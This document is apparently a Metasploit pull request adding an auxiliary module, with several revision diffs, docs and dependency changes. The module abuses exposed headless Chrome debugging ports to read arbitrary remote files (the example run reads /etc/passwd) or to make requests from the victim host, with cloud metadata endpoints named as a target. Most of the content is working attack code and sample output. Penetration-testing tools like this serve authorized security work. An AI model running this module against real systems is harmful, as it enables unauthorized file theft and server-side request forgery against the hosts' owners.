### PR TITLE
Adding Chrome Debugger Gather Auxiliary Module

### DIFF
--- a/documentation/modules/auxiliary/gather/chrome_debugger.md
+++ b/documentation/modules/auxiliary/gather/chrome_debugger.md
@@ -1,6 +1,6 @@
 # Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
 
-This module takes advantage of misconfigured headless chrome sessions and either retrieves a specifiedfile off the remote file system, or makes a web request from the remote machine.
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
 
 ## Headless Chrome Sessions
 	

--- a/documentation/modules/auxiliary/gather/chrome_debugger.md
+++ b/documentation/modules/auxiliary/gather/chrome_debugger.md
@@ -18,13 +18,13 @@ This will start a webserver running on port 9222 for all network interfaces.
 2. Execute `auxiliary/gather/chrome_debugger`
 3. Execute `set RHOST $REMOTE_ADDRESS`
 4. Execute `set RPORT 9222`
-5. Execute either `set FilePath $FILE_PATH_ON_REMOTE` or `set Url $URL_FROM_REMOTE`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
 6. Execute `run`
 
 ## Options
 
-* FilePath - The file path on the remote you wish to retrieve
-* Url - A URL you wish to fetch the contents of from the remote machine
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
 
 **Note:** One or the other must be set!
 

--- a/documentation/modules/auxiliary/gather/chrome_debugger.md
+++ b/documentation/modules/auxiliary/gather/chrome_debugger.md
@@ -1,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specifiedfile off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FilePath $FILE_PATH_ON_REMOTE` or `set Url $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FilePath - The file path on the remote you wish to retrieve
+* Url - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -203,4 +203,8 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'aws-sdk-s3'
   spec.add_runtime_dependency 'aws-sdk-ec2'
   spec.add_runtime_dependency 'aws-sdk-iam'
+
+  # Needed for WebSocket Support
+  spec.add_runtime_dependency 'faye-websocket'
+  spec.add_runtime_dependency 'eventmachine'
 end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -2,7 +2,7 @@ class MetasploitModule < Msf::Auxiliary
   require 'eventmachine'
   require 'faye/websocket'
   include Msf::Exploit::Remote::HttpClient
-  
+
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
           print_status('Opened connection')
           id = rand(1024 * 1024 * 1024)
 
-          @@succeeded = false
+          @succeeded = false
 
           EM::Timer.new(1) do
             print_status("Attempting to load url #{fetch_uri}")
@@ -109,13 +109,13 @@ class MetasploitModule < Msf::Auxiliary
           if data['result']['result']
             print_good('Retrieved resource')
             store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
-            @@succeeded = true
+            @succeeded = true
           end
         end
 
         EM::Timer.new(datastore['Timeout']) do
           EventMachine.stop
-          fail_with(Failure::Unknown, 'Unknown failure occurred') if not @@succeeded
+          fail_with(Failure::Unknown, 'Unknown failure occurred') if not @succeeded
         end
       }
     end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -1,6 +1,8 @@
 class MetasploitModule < Msf::Auxiliary
+  require 'eventmachine'
+  require 'faye/websocket'
   include Msf::Exploit::Remote::HttpClient
-
+  
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
@@ -74,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
           print_status('Opened connection')
           id = rand(1024 * 1024 * 1024)
 
-          succeeded = false
+          @@succeeded = false
 
           EM::Timer.new(1) do
             print_status("Attempting to load url #{fetch_uri}")
@@ -107,13 +109,13 @@ class MetasploitModule < Msf::Auxiliary
           if data['result']['result']
             print_good('Retrieved resource')
             store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
-            succeeded = true
+            @@succeeded = true
           end
         end
 
         EM::Timer.new(datastore['Timeout']) do
           EventMachine.stop
-          fail_with(Failure::Unknown, 'Unknown failure occurred') if not succeeeded
+          fail_with(Failure::Unknown, 'Unknown failure occurred') if not @@succeeded
         end
       }
     end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -1,0 +1,113 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
+      'Description' => %q{
+        This module uses the Chrome Debugger's API to read
+	files off the remote file system, or to make web requests
+	from a remote machine.  Useful for cloud metadata endpoints!
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
+        'Nicholas Starke (The King Pig Demon)' # msf module
+      ],
+      'Privileged' => false,
+      'Targets' => [
+      ],
+      'DisclosureDate' => 'Sep 24 2019',
+      'DefaultOptions' => {
+      },
+      'DefaultTarget' => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST,
+        Opt::RPORT(9222),
+        OptString.new('FilePath', [ false, 'File to fetch from remote machine.']),
+        OptString.new('Url', [ false, 'Url to fetch from remote machine.'])
+
+      ]
+    )
+
+    deregister_options('Proxies')
+  end
+
+  def run
+
+    res = send_request_cgi({
+        'uri' => '/json',
+        'method' => 'GET',
+    })
+
+    if datastore['FilePath'].empty? and datastore['Url'].empty?
+      print_error('Must set FilePath or Url')
+      return
+    end
+
+    if res.nil?
+      print_error('Bad Response')
+    else
+      data = JSON.parse(res.body).pop
+      EM.run {
+        file_path = datastore['FilePath']
+        url = datastore['Url']
+
+        if file_path
+          fetch_uri = "file://#{file_path}"
+        else
+          fetch_uri = url
+        end
+        print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")
+
+        driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])
+
+        driver.on :open do |event|
+          print_status('Opened connection')
+          id = rand(1024 * 1024 * 1024)
+
+          EM::Timer.new(1) do
+            print_status("Attempting to load url #{fetch_uri}")
+            driver.send({
+              'id' => id,
+              'method' => 'Page.navigate',
+              'params' => {
+                'url':  fetch_uri,
+              }
+            }.to_json)
+          end
+
+          EM::Timer.new(3) do
+            print_status('Sending request for data')
+            driver.send({
+              'id' => id + 1,
+              'method' => 'Runtime.evaluate',
+              'params' => {
+                'expression' => 'document.documentElement.outerHTML'
+              }
+            }.to_json)
+          end
+        end
+
+        driver.on :message do |event|
+          print_status("Received Data")
+
+          data = JSON.parse(event.data)
+
+          if data['result']['result']
+            print_good('Retrieved resource')
+            store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
+          end
+        end
+
+        EM::Timer.new(10) do
+          EventMachine.stop
+        end
+      }
+    end
+  end
+end
+

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -74,6 +74,8 @@ class MetasploitModule < Msf::Auxiliary
           print_status('Opened connection')
           id = rand(1024 * 1024 * 1024)
 
+          succeeded = false
+
           EM::Timer.new(1) do
             print_status("Attempting to load url #{fetch_uri}")
             driver.send({
@@ -105,11 +107,13 @@ class MetasploitModule < Msf::Auxiliary
           if data['result']['result']
             print_good('Retrieved resource')
             store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
+            succeeded = true
           end
         end
 
         EM::Timer.new(datastore['Timeout']) do
           EventMachine.stop
+          fail_with(Failure::Unknown, 'Unknown failure occurred') if not succeeeded
         end
       }
     end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
 
-    if datastore['FilePath'].empty? and datastore['Url'].empty?
+    if (datastore['FilePath'].nil? || datastore['FilePath'].empty?) && (datastore['Url'].nil? || datastore['Url'].empty?)
       print_error('Must set FilePath or Url')
       return
     end
@@ -107,8 +107,8 @@ class MetasploitModule < Msf::Auxiliary
           data = JSON.parse(event.data)
 
           if data['result']['result']
-            print_good('Retrieved resource')
-            store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
+            loot_path = store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
+            print_good("Stored #{fetch_uri} at #{loot_path}")
             @succeeded = true
           end
         end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RHOST,
         Opt::RPORT(9222),
         OptString.new('FilePath', [ false, 'File to fetch from remote machine.']),
-        OptString.new('Url', [ false, 'Url to fetch from remote machine.'])
+        OptString.new('Url', [ false, 'Url to fetch from remote machine.']),
+        OptInt.new('Timeout', [ true, 'Time to wait for response', 10])
       ]
     )
 
@@ -60,7 +61,12 @@ class MetasploitModule < Msf::Auxiliary
         else
           fetch_uri = url
         end
+
         print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")
+
+        if not data.key?('webSocketDebuggerUrl')
+          fail_with(Failure::Unknown, "Invalid JSON")
+        end
 
         driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])
 
@@ -102,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
           end
         end
 
-        EM::Timer.new(10) do
+        EM::Timer.new(datastore['Timeout']) do
           EventMachine.stop
         end
       }

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -29,18 +29,20 @@ class MetasploitModule < Msf::Auxiliary
       [
         Opt::RHOST,
         Opt::RPORT(9222),
-        OptString.new('FilePath', [ false, 'File to fetch from remote machine.']),
-        OptString.new('Url', [ false, 'Url to fetch from remote machine.']),
-        OptInt.new('Timeout', [ true, 'Time to wait for response', 10])
+        OptString.new('FILEPATH', [ false, 'File to fetch from remote machine.']),
+        OptString.new('URL', [ false, 'Url to fetch from remote machine.']),
+        OptInt.new('TIMEOUT', [ true, 'Time to wait for response', 10])
       ]
     )
 
     deregister_options('Proxies')
+    deregister_options('VHOST')
+    deregister_options('SSL')
   end
 
   def run
 
-    if (datastore['FilePath'].nil? || datastore['FilePath'].empty?) && (datastore['Url'].nil? || datastore['Url'].empty?)
+    if (datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?) && (datastore['URL'].nil? || datastore['URL'].empty?)
       print_error('Must set FilePath or Url')
       return
     end
@@ -55,8 +57,8 @@ class MetasploitModule < Msf::Auxiliary
     else
       data = JSON.parse(res.body).pop
       EM.run {
-        file_path = datastore['FilePath']
-        url = datastore['Url']
+        file_path = datastore['FILEPATH']
+        url = datastore['URL']
 
         if file_path
           fetch_uri = "file://#{file_path}"
@@ -113,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
           end
         end
 
-        EM::Timer.new(datastore['Timeout']) do
+        EM::Timer.new(datastore['TIMEOUT']) do
           EventMachine.stop
           fail_with(Failure::Unknown, 'Unknown failure occurred') if not @succeeded
         end

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -6,8 +6,8 @@ class MetasploitModule < Msf::Auxiliary
       'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
       'Description' => %q{
         This module uses the Chrome Debugger's API to read
-	files off the remote file system, or to make web requests
-	from a remote machine.  Useful for cloud metadata endpoints!
+        files off the remote file system, or to make web requests
+        from a remote machine.  Useful for cloud metadata endpoints!
       },
       'License' => MSF_LICENSE,
       'Author' => [
@@ -20,6 +20,10 @@ class MetasploitModule < Msf::Auxiliary
       'DisclosureDate' => 'Sep 24 2019',
       'DefaultOptions' => {
       },
+      'References'     =>
+        [
+          ['CVE', 'NONE']
+        ],
       'DefaultTarget' => 0
     ))
 

--- a/modules/auxiliary/gather/chrome_debugger.rb
+++ b/modules/auxiliary/gather/chrome_debugger.rb
@@ -20,10 +20,6 @@ class MetasploitModule < Msf::Auxiliary
       'DisclosureDate' => 'Sep 24 2019',
       'DefaultOptions' => {
       },
-      'References'     =>
-        [
-          ['CVE', 'NONE']
-        ],
       'DefaultTarget' => 0
     ))
 
@@ -33,7 +29,6 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(9222),
         OptString.new('FilePath', [ false, 'File to fetch from remote machine.']),
         OptString.new('Url', [ false, 'Url to fetch from remote machine.'])
-
       ]
     )
 
@@ -42,15 +37,15 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
 
-    res = send_request_cgi({
-        'uri' => '/json',
-        'method' => 'GET',
-    })
-
     if datastore['FilePath'].empty? and datastore['Url'].empty?
       print_error('Must set FilePath or Url')
       return
     end
+
+    res = send_request_cgi({
+        'uri' => '/json',
+        'method' => 'GET',
+    })
 
     if res.nil?
       print_error('Bad Response')


### PR DESCRIPTION
This module can retrieve a file from a remote host that is
running a chrome session in headless mode on all network interfaces.
It can also make a web request from the remote host and send back the
full contents.

Contains documentation and two dependency additions.
